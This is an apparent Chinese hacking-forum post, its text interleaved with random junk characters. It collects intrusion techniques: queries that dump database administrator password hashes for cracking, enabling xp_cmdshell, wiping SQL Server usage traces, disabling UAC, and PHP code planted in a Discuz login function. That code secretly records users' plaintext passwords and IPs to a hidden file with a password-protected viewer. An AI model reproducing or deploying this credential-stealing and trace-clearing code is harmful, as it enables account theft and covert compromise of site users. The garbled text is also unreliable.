各种类型数据库抓HASH破解最高权限密码!( Y" x: i: |% f5 X2 f8 [
1.sql server2000( \; j8 {: c- t) E* z
SELECT password from master.dbo.sysxlogins where name='sa'
7 d8 t$ p5 |9 a* _4 Q7 f" e0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
: A# ^; H: d0 }1 a' D: _2FD54D6119FFF04129A1D72E7C3194F7284A7F3A" x7 l+ A) s# G! B6 T. Z! ]
+ B ^* F) d- n/ T6 l2 O. z" ~
0×0100- constant header8 `. s* P0 ?$ P/ Q2 _+ p% W& A
34767D5C- salt, n- D( F, \ ?
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash/ r1 |5 L! [/ h0 A5 K5 ]$ z
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash% J, a+ y! X6 \: ]/ g b& g( i/ V) z
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
/ _5 F8 W1 s8 qSQL server 2005:-
3 w) q4 T2 l8 {" J) q0 KSELECT password_hash FROM sys.sql_logins where name='sa'* e( B& b+ X# L. s' f4 P
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
/ X7 X( N. k# ?+ |9 V0×0100- constant header. P9 r7 q# @1 Z; c
993BF231-salt$ w! U7 }' Z& o3 Z8 y7 S3 M3 o
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash) j# w4 `( Z0 w( E
crack case sensitive hash in cain, try brute force and dictionary based attacks.3 p# r! ~: K2 Q. F' M. w' k
7 F4 s4 E" Z0 T" Z# @$ Eupdate:- following bernardo’s comments:-9 q$ m# J; k1 N8 ^0 Z7 K' u' g
use function fn_varbintohexstr() to cast password in a hex string.4 E& X9 w8 ?/ Z; K
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins- r6 c0 E+ @$ ^4 y, X& A/ J5 R
5 V8 v+ w' P- ~) i7 mMYSQL:-
Z0 t- u8 X9 w2 a
8 X I" q5 X$ C8 J( k, I, y, ]In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
+ M+ }* l3 ?0 V4 g7 v( a" W( g$ U* u0 C6 z$ u/ x
*mysql < 4.13 h4 u0 j' |) R3 ~
" _9 B7 U0 T# C9 J" G+ n
mysql> SELECT PASSWORD(‘mypass’);
! O; ?/ |. E ^; Z9 m! q. z+——————–+. r1 x2 n9 L: a' E* z6 O" J
| PASSWORD(‘mypass’) |
" L. M, |. @- j! f8 v y- {1 Z' b+——————–+
& b, e& L1 F5 r3 r3 @| 6f8c114b58f2ce9e |1 y) j3 s! |4 y
+——————–+
. T% A' ]8 }, y# R& i1 W( [ S D% a+ A
*mysql >=4.1* x1 z# o* x& V+ S# H& e2 t, G
& y7 g( m7 L2 \! \& Z4 Q+ z
mysql> SELECT PASSWORD(‘mypass’);
+ c$ }( `9 z7 v- }# K+——————————————-+# S$ K" W& G% Q7 a% K* r
| PASSWORD(‘mypass’) |) p* r; X8 X2 q* L) z
+——————————————-+
; ?) A8 _' O- i1 ^0 Q) R" G5 P| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
8 u9 e2 |0 Z! S+——————————————-+
0 ~2 j; a1 X- r' r2 m+ Y: F! D# ~: k. C# i3 T$ b& V
Select user, password from mysql.user# T5 w: G8 N1 F* f5 @# f: X6 J
The hashes can be cracked in ‘cain and abel’
/ V" P5 t# P; S) n2 ]* j/ M7 z3 L+ u. w
Postgres:-
; C: f2 N- ?1 D% p6 | _4 q% mPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
' E* l1 q7 R$ Rselect usename, passwd from pg_shadow;
/ s$ d1 y: m* gusename | passwd7 K: v& Z0 L- A9 r; x! \2 b4 X' q. Z
——————+————————————-
0 _3 U E2 |* \& u a* ]testuser | md5fabb6d7172aadfda4753bf0507ed4396, e& h& w. b; A/ `- q: G+ b5 j, T
use mdcrack to crack these hashes:-. R' p' @9 O( {# C# h* W& g4 j5 B
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396' G) ^$ \% ?8 o8 M# W# N, p
: \5 V: _" p9 J6 T' z* C- S4 J, j! e
Oracle:-
9 z* i& D4 ]* |select name, password, spare4 from sys.user$2 _( G/ H7 {5 ?7 u
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
+ E. }3 L& Q9 }& PMore on Oracle later, i am a bit bored….
+ D! N2 ~& j* g. @5 r& ?' @3 k% M2 t8 V ?
; K8 L [. p F. G! M! n. O
在sql server2005/2008中开启xp_cmdshell
5 j* O; m9 t1 Y) @-- To allow advanced options to be changed.6 B; x7 r- O, H( R' y& s
EXEC sp_configure 'show advanced options', 1
, w& @ B* z3 d3 }6 C; AGO
, I" F/ M0 }$ U0 e! w: F& Q-- To update the currently configured value for advanced options.
& e& I9 y0 i2 X+ LRECONFIGURE
| S3 d" C% O; l! m; W {/ BGO0 h2 f2 R$ o1 B( U$ k0 Y# C
-- To enable the feature.
6 j0 x& p+ b# O- oEXEC sp_configure 'xp_cmdshell', 1
6 N3 K8 _) U8 J5 n1 K$ n! U) `+ S. EGO; v I3 R* w& ` Z% G
-- To update the currently configured value for this feature.0 P8 k' D1 G; ~; O$ \
RECONFIGURE
+ e# B# O7 D- Z: k5 PGO" K3 Y% p6 G. V5 K+ w' M& H
SQL 2008 server日志清除,在清楚前一定要备份。+ Y3 G& u2 y$ H9 ^( y) o) a" T
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
4 q: Z* ~! L, A$ d$ k/ aX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin6 ]+ P( ]( q3 \( _
7 Y6 t) w7 b9 |% t
对于SQL Server 2008以前的版本:! @4 x/ B% _3 Z7 b6 X* V' e
SQL Server 2005:/ x- q- p8 W& Y
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
" @9 j+ t; s) e# ]1 s8 Q" N+ OSQL Server 2000:
, K0 u: }, H1 n' V$ V6 T9 \清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
! Q( w& G( n8 Y6 J0 Z$ K
3 s [! k. }, } E- ]6 ^本帖最后由 simeon 于 2013-1-3 09:51 编辑
$ d% P1 n0 Y+ v( I# e
4 { N" _3 Y$ w) ?; \% m! C+ r* v
. M D+ l& }/ h$ E0 t% qwindows 2008 文件权限修改
0 d# H9 V1 c" ^/ m1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx! d2 V/ u' o" j+ W3 Z7 v2 Z
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
% U" G Z) {9 P3 I7 o9 H% g3 [一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
) A$ o% T5 H; ?7 g8 ? v6 I# `$ r- J' O+ G' W, `' p
Windows Registry Editor Version 5.006 Y( @- j, @( g/ a+ V
[HKEY_CLASSES_ROOT\*\shell\runas]
1 s* P! o R% X- {4 ~@="管理员取得所有权"# u; X6 E* ]! X G5 t+ ]
"NoWorkingDirectory"=""
6 m2 V+ E$ Z& V" ?1 Y o0 v" O" t[HKEY_CLASSES_ROOT\*\shell\runas\command]7 R8 [( s2 B8 j% [- }
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( e6 H6 y+ I' ]% S3 G, ]
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ d9 Y6 a% J" O8 E& B
[HKEY_CLASSES_ROOT\exefile\shell\runas2]9 G: B D* [/ H: X. i/ K
@="管理员取得所有权"3 `' K c$ N1 c
"NoWorkingDirectory"=""
7 N+ r4 I: p* Y[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
3 ]4 A: B; b% W% C$ _4 O, l7 }! L6 t@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" J3 Z# O8 `1 Y4 W: C/ i2 r
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! E. T" ]% w. I0 r# V$ _- ?
( H { u% Q u5 S: ?
[HKEY_CLASSES_ROOT\Directory\shell\runas]2 R1 l" ? I7 \2 \9 a7 @4 f
@="管理员取得所有权"5 f( X# P+ L Q3 @
"NoWorkingDirectory"="", n, P+ j4 I; E* n" L/ Z5 X
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
" _" z, I. S( X# k& e@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
' P& x! F$ K% X* k( U! W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"" J( t1 X9 f, U; v/ o9 }- @, \
$ i' D7 V: z7 `% N, q" d, u! o
- b6 O% y/ \, s {, l- o& }win7右键“管理员取得所有权”.reg导入
; v' J5 g3 a5 a4 Z# [1 M4 |二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
) t0 W. _& h: f: D& p1、C:\Windows这个路径的“notepad.exe”不需要替换
. M1 P' X! Q% @' D/ d& A y+ K2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
4 R2 f$ \7 n" O1 R9 M+ P& b3、四个“notepad.exe.mui”不要管0 N1 k) v( D' z! u
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和/ `) z O. t0 ~( y0 f
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
: K. i, k& D+ n. Z: X/ u( Z% O替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,- f7 |+ v% F$ V" O: Q: @ ~
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
, E @1 _9 E' R6 J4 T" Hwindows 2008中关闭安全策略: ; A2 n( E1 x) Q N* w! |- B% x
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
& I, t8 a# d3 h& z修改uc_client目录下的client.php 在
0 N- x! e( y/ E6 y/ F. }. l, tfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
' t* b6 j; a- w+ |' \下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
1 e: }# h8 k, D# v! g你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
& W6 t: B* p% j4 w) |/ P9 ^6 Aif(getenv('HTTP_CLIENT_IP')) {
& {# m. _2 T6 u! \5 ~ I# S! O0 J5 R$onlineip = getenv('HTTP_CLIENT_IP');% B" ~; K$ Z, E n6 H0 \/ @) M
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {# e2 X- e3 I0 N3 s ]( I4 L
$onlineip = getenv('HTTP_X_FORWARDED_FOR');9 R% V3 N' J0 ^) n( J+ j
} elseif(getenv('REMOTE_ADDR')) {8 D% [; e1 J$ x
$onlineip = getenv('REMOTE_ADDR');! }5 j5 f+ i* [. ^, K) {/ n
} else {. {% H3 V+ z2 ~
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
: t- Z5 O$ p' `/ t}4 V! d, W7 V8 g" @
$showtime=date("Y-m-d H:i:s");2 Q; I) N$ e- W5 t- A+ V
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
1 p. S! x5 o% q8 [ $handle=fopen('./data/cache/csslog.php','a+');$ a+ f( u# e, H% S( D& q
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对